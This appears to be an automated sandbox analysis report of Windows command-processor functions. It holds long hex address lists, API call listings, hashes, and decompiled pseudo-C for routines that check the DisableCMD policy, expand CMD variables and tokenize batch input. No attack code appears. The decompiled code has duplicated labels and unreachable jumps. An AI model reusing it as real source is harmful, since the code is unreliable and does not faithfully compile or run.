                                              0x002c6a6c
                                              0x002c6a76
                                              0x002c6a7e
                                              0x002c6a84
                                              0x002c6a88
                                              0x002c6a8c
                                              0x002c6a8c
                                              0x002c6a90
                                              0x002c6a94
                                              0x00000000
                                              0x002c6a96
                                              0x002c6a96
                                              0x002c6a9a
                                              0x00000000
                                              0x00000000
                                              0x002c6a9c
                                              0x002c6aa4
                                              0x002c6aa4
                                              0x00000000
                                              0x002c6aa4
                                              0x002c6a9e
                                              0x002c6aa2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c6aa2
                                              0x002c68e9
                                              0x002c68e9
                                              0x002c68eb
                                              0x002c68ec
                                              0x002c68ee
                                              0x002c68f6
                                              0x002c68fa
                                              0x002c68fc
                                              0x00000000
                                              0x00000000
                                              0x002c6902
                                              0x002c6902
                                              0x002c6909
                                              0x00000000
                                              0x00000000
                                              0x002c6911
                                              0x002c6916
                                              0x002c6918
                                              0x002c695d
                                              0x002c6964
                                              0x002c69a5
                                              0x002c69aa
                                              0x002c69c4
                                              0x002c69c8
                                              0x002c69cc
                                              0x002c69d5
                                              0x002c69dc
                                              0x002c69e1
                                              0x002c69e6
                                              0x002c69ea
                                              0x002c69ee
                                              0x002c69f8
                                              0x002c69f8
                                              0x002c69fc
                                              0x002c6a04
                                              0x002c6a06
                                              0x002c6a0a
                                              0x002c6a0a
                                              0x002c6a0c
                                              0x002c6a10
                                              0x002c6a10
                                              0x002c6a14
                                              0x002c6a14
                                              0x002c6a16
                                              0x002c6a1e
                                              0x002c6a1e
                                              0x002c6a24
                                              0x002c6a29
                                              0x002c6a2b
                                              0x002c6a2d
                                              0x002c6a2d
                                              0x002c6a37
                                              0x002c6a39
                                              0x002c6a3e
                                              0x002c6a40
                                              0x002c6acd
                                              0x002c6acf
                                              0x002c6ad4
                                              0x002c6ad6
                                              0x002c6aee
                                              0x002c6ad8
                                              0x002c6ad8
                                              0x002c6ada
                                              0x002c6adf
                                              0x002c6ae5
                                              0x00000000
                                              0x002c6a46
                                              0x002c6a46
                                              0x002c6a48
                                              0x002c6a4a
                                              0x00000000
                                              0x002c6a50
                                              0x002c6a40
                                              0x002c6a1a
                                              0x002c6a1c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c6a1c
                                              0x002c69ac
                                              0x002c69ac
                                              0x002c69b0
                                              0x002c69b8
                                              0x002c69be
                                              0x00000000
                                              0x002c69be
                                              0x002c6966
                                              0x002c696b
                                              0x00000000
                                              0x00000000
                                              0x002c696d
                                              0x002c6971
                                              0x002c697e
                                              0x002c698c
                                              0x002c698e
                                              0x002c6992
                                              0x002c6994
                                              0x002c6998
                                              0x002c699b
                                              0x002c699f
                                              0x00000000
                                              0x002c699f
                                              0x002c6932
                                              0x002c6938
                                              0x002c693c
                                              0x002c693e
                                              0x002c6942
                                              0x00000000
                                              0x00000000
                                              0x002c6944
                                              0x002c6948
                                              0x002c694a
                                              0x00000000
                                              0x00000000
                                              0x002c694c
                                              0x002c694e
                                              0x002c6950
                                              0x002c6954
                                              0x00000000
                                              0x002c6954
                                              0x002c68f0
                                              0x00000000
                                              0x002c6a51
                                              0x002c6a51
                                              0x002c6a51
                                              0x002c6a59
                                              0x00000000
                                              0x002c6a59
                                              0x002c68e3
                                              0x002c6856
                                              0x002c685a
                                              0x002c685c
                                              0x00000000
                                              0x00000000
                                              0x002c6862
                                              0x00000000
                                              0x002c6862
                                              0x00000000
                                              0x002c67fa
                                              0x00000000
                                              0x002c6806
                                              0x002c67c5
                                              0x002c67cb
                                              0x00000000
                                              0x00000000
                                              0x002c67cd
                                              0x002c67d1
                                              0x002c67a8
                                              0x002c67a8
                                              0x00000000
                                              0x002c67a8
                                              0x002c67a6
                                              0x002c67a6
                                              0x00000000
                                              0x002c67a6
                                              0x002c6762
                                              0x002c6767
                                              0x002c676f
                                              0x002c67b1
                                              0x002c67b1
                                              0x002c67b1
                                              0x002c67b6
                                              0x00000000
                                              0x002c67b6
                                              0x002c6771
                                              0x002c6771
                                              0x002c6784
                                              0x002c6788
                                              0x002c678b
                                              0x002c678f
                                              0x002c6795
                                              0x002c6799
                                              0x00000000
                                              0x002c6799
                                              0x002c6af3
                                              0x002c6af5
                                              0x00000000
                                              0x002c6af5
                                              0x002c6663
                                              0x002c6668
                                              0x002c666a
                                              0x002c66b4
                                              0x002c66b4
                                              0x002c66ba
                                              0x002c66bd
                                              0x002c66c1
                                              0x002c66c2
                                              0x002c66c2
                                              0x00000000
                                              0x002c66bd
                                              0x002c666c
                                              0x002c6673
                                              0x002c6675
                                              0x002c6677
                                              0x002c6677
                                              0x002c668c
                                              0x002c6692
                                              0x002c6694
                                              0x00000000
                                              0x00000000
                                              0x002c6696
                                              0x002c669d
                                              0x002c669f
                                              0x002c66a1
                                              0x002c66a1
                                              0x002c66a6
                                              0x002c66ad
                                              0x002c66af
                                              0x002c66b2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c6640
                                              0x002c6642
                                              0x002c6643
                                              0x002c6643
                                              0x002c6afa
                                              0x002c6b01
                                              0x002c6b11
                                              0x002c6b12
                                              0x002c6b13
                                              0x002c6b1e
                                              0x002c6b1e

                                              APIs
                                              • memset.MSVCRT ref: 002C6613
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 002C668C
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002C6B01
                                                • Part of subcall function 002B0178: _get_osfhandle.MSVCRT ref: 002B0183
                                                • Part of subcall function 002B0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002BD6A1), ref: 002B018D
                                              • _get_osfhandle.MSVCRT ref: 002C66E9
                                              • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 002C66F1
                                              • _get_osfhandle.MSVCRT ref: 002C6701
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002C6709
                                                • Part of subcall function 002B269C: _get_osfhandle.MSVCRT ref: 002B26A7
                                                • Part of subcall function 002B269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002AC5F8,?,?,?), ref: 002B26B6
                                                • Part of subcall function 002B269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26D2
                                                • Part of subcall function 002B269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,00000002), ref: 002B26E1
                                                • Part of subcall function 002B269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002B26EC
                                                • Part of subcall function 002B269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(002E7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AC5C6), ref: 002B26F5
                                              • _get_osfhandle.MSVCRT ref: 002C6739
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 002C6741
                                              • memmove.MSVCRT ref: 002C678F
                                              • _get_osfhandle.MSVCRT ref: 002C6812
                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002C681A
                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 002C6882
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 002C692B
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002C6932
                                              • _get_osfhandle.MSVCRT ref: 002C697E
                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002C6986
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 002C6A1E
                                              • _get_osfhandle.MSVCRT ref: 002C6A76
                                              • SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002C6A7E
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 002C6AAD
                                                • Part of subcall function 002C9953: _get_osfhandle.MSVCRT ref: 002C9956
                                                • Part of subcall function 002C9953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 002C995E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
                                              • String ID: DPATH
                                              • API String ID: 1247154890-2010427443
                                              • Opcode ID: f2785d3fede2998cc1408db1560a90d2cb205ec64cc1733040c390ae6d767aae
                                              • Instruction ID: 4583aa37347c492597fba9b3e779e2eed088549672eec549a3609e275745ee3e
                                              • Opcode Fuzzy Hash: f2785d3fede2998cc1408db1560a90d2cb205ec64cc1733040c390ae6d767aae
                                              • Instruction Fuzzy Hash: 58F1AF716283429FDB24CF24D88CB6BB7E8FB88714F144A2EF58597290DB70D958CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B44FC, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242registrythreadmemoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 69%
                                              			E002B44FC() {
				signed int _v8;
				char _v24;
				int* _v28;
				char _v29;
				char _v36;
				void* _v40;
				int* _v44;
				int _v48;
				int _v52;
				signed int _t26;
				void* _t39;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t51;
				int _t53;
				intOrPtr _t55;
				int _t59;
				int _t64;
				void* _t73;
				void* _t75;
				intOrPtr _t82;
				void* _t84;
				void* _t95;
				char* _t96;
				signed int _t97;
				signed int _t98;

				_t26 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t26 ^ _t98;
				_v44 = 0;
				 *0x2db938 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
				E002B465D(_t75);
				__imp__HeapSetInformation(0, 1, 0, 0, _t95, _t97, _t73);
				_v36 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_v40) == 0) {
					_v48 = 4;
					RegQueryValueExW(_v40, L"DisableCMD", 0,  &_v52,  &_v36,  &_v48);
					RegCloseKey(_v40);
				}
				 *0x2cd614 = 1;
				_t93 = 0x2cd600;
				 *0x2cd610 =  &_v29;
				_t39 = E002B4719(0x2cd600);
				asm("sbb al, al");
				 *0x2cd614 =  *0x2cd614 &  ~(_t39 - 1);
				E002B46D8();
				_v28 = 0;
				_t96 =  &_v24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t44 = E002B3D27(0,  &_v24);
				if(_v36 == 1) {
					_push(0);
					_push(0x40002729);
					E002AC108( &_v24);
					E002C3BB0(__eflags, 0);
					do {
						__eflags = E002B4B60(__eflags, 0);
					} while (__eflags == 0);
					_push(0xff);
					goto L13;
				} else {
					_t96 = 0xff;
					if(_t44 == 0) {
						L29:
						_push(0);
						L002B82C1();
						_v28 = _t44;
						_t84 = 0x2db8b8;
						_t97 = 2;
						__eflags = _t44;
						if(_t44 == 0) {
							L33:
							__eflags = _v36 - _t97;
							if(_v36 != _t97) {
								_t55 = E002B0178(_t44);
								__eflags = _t55;
								if(_t55 == 0) {
									_t97 = 3;
									__imp___setmode(0x8000);
									0 = 0;
								}
								E002AB2B0(0, 0);
								while(1) {
									L40:
									 *0x2cd590 = 0;
									EnterCriticalSection( *0x2d3858);
									 *0x2cd544 = 0;
									LeaveCriticalSection( *0x2d3858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E002AEEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
									if(_t96 == 1) {
										continue;
									}
									L41:
									__eflags = _t96 - 0xffffffff;
									if(__eflags == 0) {
										do {
											__eflags = E002B4B60(__eflags, 0);
										} while (__eflags == 0);
										L25:
										_push(0);
										L13:
										exit();
										L14:
										_t48 = E002AEEF0(1, _t93,  *0x2e3cd8);
										if(_t48 == 1) {
											do {
												__eflags = E002B4B60(__eflags, 0);
											} while (__eflags == 0);
											_push(1);
											goto L13;
										}
										if(_t48 == 0xffffffff) {
											do {
												__eflags = E002B4B60(__eflags, 0);
											} while (__eflags == 0);
											goto L25;
										}
										_t93 = _t48;
										_t51 = E002B0E00(0, _t48);
										if(_t51 != 0) {
											_v28 = _t51;
										}
										L8:
										_t97 = _t97 + 1;
										if(_t97 < 3) {
											L7:
											_t93 =  *((intOrPtr*)(_t98 + _t97 * 4 - 0x14));
											if( *((intOrPtr*)(_t98 + _t97 * 4 - 0x14)) != 0) {
												goto L14;
											}
											goto L8;
										}
										E002B06C0(0);
										_t53 = GetConsoleOutputCP();
										 *0x2d3854 = _t53;
										GetCPInfo(_t53, 0x2d3840);
										_t44 = E002B465D(0);
										_t82 =  *0x2e3ccc;
										L10:
										_t106 = _t82;
										if(_t82 == 0) {
											 *0x2e8058 = 0;
											goto L29;
										} else {
											goto L11;
										}
										do {
											L11:
										} while (E002B4B60(_t106, 0) == 0);
										_push(_v28);
										goto L13;
									}
									EnterCriticalSection( *0x2d3858);
									 *0x2cd544 = 0;
									LeaveCriticalSection( *0x2d3858);
									_t59 = GetConsoleOutputCP();
									 *0x2d3854 = _t59;
									GetCPInfo(_t59, 0x2d3840);
									E002B465D(_t86);
									E002B0E00(0, _t96);
									 *0x2cd59c = 0;
									E002B06C0(0);
									_t64 = GetConsoleOutputCP();
									 *0x2d3854 = _t64;
									GetCPInfo(_t64, 0x2d3840);
									E002B465D(0);
									do {
										goto L40;
									} while (_t96 == 1);
									goto L41;
									L40:
									 *0x2cd590 = 0;
									EnterCriticalSection( *0x2d3858);
									 *0x2cd544 = 0;
									LeaveCriticalSection( *0x2d3858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E002AEEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
								}
							}
							_push(0);
							_push(0x40002729);
							E002AC108(_t84);
							E002C3BB0(__eflags, 0);
							do {
								__eflags = E002B4B60(__eflags, 0);
							} while (__eflags == 0);
							_push(_t96);
							goto L13;
						}
						__eflags = _t44 - _t97;
						if(__eflags != 0) {
							goto L33;
						} else {
							goto L31;
						}
						do {
							L31:
							__eflags = E002B4B60(__eflags, 0);
						} while (__eflags == 0);
						goto L25;
					}
					_push(0);
					_push(0x2db8b8);
					L002B82C1();
					_t82 =  *0x2e3ccc;
					if(_t44 != 0) {
						_t44 = 1;
						_v44 = 1;
						__eflags = _t82;
						if(__eflags != 0) {
							_v28 = 0xff;
						}
					} else {
						_t44 = _v44;
					}
					if(_t44 != 0) {
						goto L10;
					} else {
						_t97 = 0;
						goto L7;
					}
				}
			}





























                                              0x002b4504
                                              0x002b450b
                                              0x002b4513
                                              0x002b4529
                                              0x002b452e
                                              0x002b4538
                                              0x002b4541
                                              0x002b455d
                                              0x002be6ee
                                              0x002be707
                                              0x002be710
                                              0x002be710
                                              0x002b4566
                                              0x002b456d
                                              0x002b4572
                                              0x002b4577
                                              0x002b457f
                                              0x002b4581
                                              0x002b4587
                                              0x002b458e
                                              0x002b4591
                                              0x002b4594
                                              0x002b4598
                                              0x002b4599
                                              0x002b459a
                                              0x002b459b
                                              0x002b45a4
                                              0x002be71b
                                              0x002be71c
                                              0x002be721
                                              0x002be729
                                              0x002be72e
                                              0x002be734
                                              0x002be734
                                              0x002be738
                                              0x00000000
                                              0x002b45aa
                                              0x002b45aa
                                              0x002b45b1
                                              0x002be77f
                                              0x002be77f
                                              0x002be785
                                              0x002be78a
                                              0x002be78e
                                              0x002be791
                                              0x002be792
                                              0x002be794
                                              0x002be7a6
                                              0x002be7a6
                                              0x002be7a9
                                              0x002be7d0
                                              0x002be7d5
                                              0x002be7d7
                                              0x002be7db
                                              0x002be7e2
                                              0x002be7e9
                                              0x002be7e9
                                              0x002be7eb
                                              0x002be7f0
                                              0x002be7f0
                                              0x002be7f6
                                              0x002be7fc
                                              0x002be808
                                              0x002be80e
                                              0x002be815
                                              0x002be817
                                              0x002be81e
                                              0x002be820
                                              0x002be823
                                              0x00000000
                                              0x00000000
                                              0x002be825
                                              0x002be825
                                              0x002be828
                                              0x002be899
                                              0x002be89f
                                              0x002be89f
                                              0x002be762
                                              0x002be762
                                              0x002b4625
                                              0x002b4625
                                              0x002b462b
                                              0x002b4634
                                              0x002b463c
                                              0x002be768
                                              0x002be76e
                                              0x002be76e
                                              0x002be772
                                              0x00000000
                                              0x002be772
                                              0x002b4645
                                              0x002be758
                                              0x002be75e
                                              0x002be75e
                                              0x00000000
                                              0x002be758
                                              0x002b464b
                                              0x002b464f
                                              0x002b4656
                                              0x002b4658
                                              0x002b4658
                                              0x002b45e3
                                              0x002b45e3
                                              0x002b45e7
                                              0x002b45db
                                              0x002b45db
                                              0x002b45e1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b45e1
                                              0x002b45e9
                                              0x002b45ee
                                              0x002b45fa
                                              0x002b45ff
                                              0x002b4605
                                              0x002b460a
                                              0x002b4610
                                              0x002b4610
                                              0x002b4612
                                              0x002be779
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002b4618
                                              0x002b4618
                                              0x002b461e
                                              0x002b4622
                                              0x00000000
                                              0x002b4622
                                              0x002be830
                                              0x002be83c
                                              0x002be842
                                              0x002be848
                                              0x002be854
                                              0x002be859
                                              0x002be85f
                                              0x002be868
                                              0x002be86d
                                              0x002be873
                                              0x002be878
                                              0x002be884
                                              0x002be889
                                              0x002be88f
                                              0x002be7f0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be7f0
                                              0x002be7f6
                                              0x002be7fc
                                              0x002be808
                                              0x002be80e
                                              0x002be815
                                              0x002be817
                                              0x002be81e
                                              0x002be820
                                              0x002be820
                                              0x002be7f0
                                              0x002be7ab
                                              0x002be7ac
                                              0x002be7b1
                                              0x002be7b9
                                              0x002be7be
                                              0x002be7c4
                                              0x002be7c4
                                              0x002be7c8
                                              0x00000000
                                              0x002be7c8
                                              0x002be796
                                              0x002be798
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002be79a
                                              0x002be79a
                                              0x002be7a0
                                              0x002be7a0
                                              0x00000000
                                              0x002be7a4
                                              0x002b45b7
                                              0x002b45b8
                                              0x002b45bd
                                              0x002b45c4
                                              0x002b45cc
                                              0x002be744
                                              0x002be745
                                              0x002be748
                                              0x002be74a
                                              0x002be750
                                              0x002be750
                                              0x002b45d2
                                              0x002b45d2
                                              0x002b45d2
                                              0x002b45d7
                                              0x00000000
                                              0x002b45d9
                                              0x002b45d9
                                              0x00000000
                                              0x002b45d9
                                              0x002b45d7

                                              APIs
                                              • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 002B4516
                                              • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 002B4523
                                                • Part of subcall function 002B465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,002B4533), ref: 002B4687
                                                • Part of subcall function 002B465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,002B4533), ref: 002B46A7
                                              • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 002B4538
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 002B4555
                                              • _setjmp3.MSVCRT ref: 002B45BD
                                              • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 002B45EE
                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,002D3840), ref: 002B45FF
                                              • exit.MSVCRT ref: 002B4625
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 002BE707
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 002BE710
                                                • Part of subcall function 002B4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,002BD822,?,00000000,00000000), ref: 002B4770
                                                • Part of subcall function 002B4719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,002BD822,?,00000000,00000000), ref: 002B478C
                                                • Part of subcall function 002B46D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(002B458C), ref: 002B46D8
                                                • Part of subcall function 002B46D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,002D3840), ref: 002B46E9
                                                • Part of subcall function 002B46D8: memset.MSVCRT ref: 002B4703
                                                • Part of subcall function 002B3D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(002D385C), ref: 002B3D4B
                                                • Part of subcall function 002B3D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002B3D57
                                                • Part of subcall function 002B3D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 002B3D6B
                                                • Part of subcall function 002B3D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(002C6D90,00000001), ref: 002B3D78
                                                • Part of subcall function 002B3D27: _get_osfhandle.MSVCRT ref: 002B3D85
                                                • Part of subcall function 002B3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B3D8D
                                                • Part of subcall function 002B3D27: _get_osfhandle.MSVCRT ref: 002B3D99
                                                • Part of subcall function 002B3D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B3DA1
                                                • Part of subcall function 002B3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 002B3DC7
                                                • Part of subcall function 002B3D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 002B3E02
                                              • _setjmp3.MSVCRT ref: 002BE785
                                              Strings
                                              • Software\Policies\Microsoft\Windows\System, xrefs: 002B454B
                                              • DisableCMD, xrefs: 002BE6FF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
                                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                              • API String ID: 4268540630-1920437939
                                              • Opcode ID: 3a82191c55251dfba6184a928250d39422d841a72170dbab9ae55d107b66f348
                                              • Instruction ID: b0f482abe315d75a3c168501eef0126ff36eea0eb23f58372516e1a8969f5533
                                              • Opcode Fuzzy Hash: 3a82191c55251dfba6184a928250d39422d841a72170dbab9ae55d107b66f348
                                              • Instruction Fuzzy Hash: 7571B671960245AFEF10BF70FCC9AEE77ADEB05394B14042AF501E61A2DE70CD609B61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002ACFBC, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 141COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,002CF830,00002000,?,?,?,?,?,002B373A,002A590A,00000000), ref: 002ACFDF
                                              • _wcsicmp.MSVCRT ref: 002AD005
                                              • _wcsicmp.MSVCRT ref: 002AD01B
                                              • _wcsicmp.MSVCRT ref: 002AD031
                                              • _wcsicmp.MSVCRT ref: 002AD047
                                              • _wcsicmp.MSVCRT ref: 002AD05D
                                              • _wcsicmp.MSVCRT ref: 002AD073
                                              • _wcsicmp.MSVCRT ref: 002AD085
                                              • _wcsicmp.MSVCRT ref: 002AD09B
                                                • Part of subcall function 002A96A0: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002CF830,?,00002000), ref: 002A96CC
                                                • Part of subcall function 002A96A0: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002A96E0
                                                • Part of subcall function 002A96A0: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 002A96F4
                                                • Part of subcall function 002A96A0: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 002A9708
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                              • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                              • API String ID: 2447294730-2301591722
                                              • Opcode ID: 62256750b1f148e08acf6f251f2e3f6411e22debe8ebf716e2a3522a56f5766e
                                              • Instruction ID: c98f1d5a38cfb1c7063df453ee49b44a29e9d7d850d2eb69263e9a0c9a8d844b
                                              • Opcode Fuzzy Hash: 62256750b1f148e08acf6f251f2e3f6411e22debe8ebf716e2a3522a56f5766e
                                              • Instruction Fuzzy Hash: C7310632278742AFE7246B35BC4EEAB779DDB47360F24801BF407D09D1EF6284218669
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AF300, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 441COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E002AF300(signed int __eax, signed short* __ecx, intOrPtr __edx, signed int _a4) {
				signed short* _v8;
				intOrPtr _v12;
				signed short* _v16;
				long _v20;
				signed int _t92;
				signed int _t102;
				signed int _t109;
				signed char _t110;
				int _t111;
				wchar_t* _t112;
				wchar_t* _t113;
				int _t114;
				signed int _t120;
				long _t121;
				int _t122;
				wchar_t* _t123;
				signed int _t129;
				int _t130;
				signed int _t135;
				int _t136;
				signed int _t139;
				signed short* _t141;
				int _t148;
				long _t152;
				int _t153;
				int _t155;
				wchar_t* _t156;
				wchar_t* _t157;
				int _t164;
				wchar_t* _t165;
				wchar_t* _t166;
				signed short* _t167;
				signed int _t169;
				signed int _t173;
				long* _t174;
				long* _t180;
				long* _t181;
				intOrPtr _t182;
				long* _t183;
				long _t184;
				long _t185;
				long _t186;
				long _t187;
				void* _t188;
				void* _t189;
				void* _t192;

				_t175 = __ecx;
				_t92 = __eax;
				_push(0);
				_push(0x2db8f8);
				_v12 = __edx;
				_v8 = __ecx;
				L002B82C1();
				_t189 = _t188 + 8;
				if(__eax != 0) {
					L139:
					return _t92 | 0xffffffff;
				}
				_t180 = _v8;
				if(_t180 == 0) {
					if( *0x2df984 != 0) {
						_push( *0x2db8a0);
						E002B25D9(L"Ungetting: \'%s\'\n");
					}
					 *0x2db8a4 =  *0x2db8a0;
					return 0;
				} else {
					if(_v12 < 6) {
						goto L139;
					}
					_t169 = _a4;
					 *0x2db8a0 =  *0x2db8a4;
					_v16 = _t180;
					if((_t169 & 0x00000021) == 0) {
						while(1) {
							_t187 = E002AF9D5(_t175) & 0x0000ffff;
							_t164 = iswspace(_t187);
							_t189 = _t189 + 4;
							if(_t164 != 0 && _t187 != 0xa) {
								goto L6;
							} else {
								continue;
							}
							do {
								_t187 = E002AF9D5(_t175) & 0x0000ffff;
								_t164 = iswspace(_t187);
								_t189 = _t189 + 4;
							} while (_t164 != 0 && _t187 != 0xa);
							L6:
							if((_t169 & 0x00000004) != 0) {
								_t165 = 0x2a2102;
							} else {
								_t165 = L"=,;";
							}
							_t166 = wcschr(_t165, _t187);
							_t189 = _t189 + 8;
							if(_t166 != 0) {
								if(_t187 == 0) {
									goto L9;
								} else {
									continue;
								}
							}
							L9:
							_t167 =  *0x2db8a4;
							if(_t167 != 0x2d3890) {
								 *0x2db8a4 = _t167 - 2;
							}
							goto L11;
						}
					}
					L11:
					_t184 = E002AF9D5(_t175) & 0x0000ffff;
					if( *0x2cd5b4 != 0) {
						 *0x2cd5b4 = 0;
						if((_t169 & 0x00000040) != 0) {
							goto L41;
						} else {
							_t184 = E002AF9D5(_t175) & 0x0000ffff;
							goto L12;
						}
						goto L140;
					} else {
						L12:
						_t129 = _t184 & 0x0000ffff;
						if(_t129 != 0xa) {
							if(_t129 >= 0x41) {
								if(_t129 >= 0x7c) {
									goto L25;
								} else {
									goto L33;
								}
							} else {
								L25:
								if(_t129 > 0x7c) {
									goto L33;
								} else {
									_t16 = _t129 + 0x2af8c0; // 0x5050500
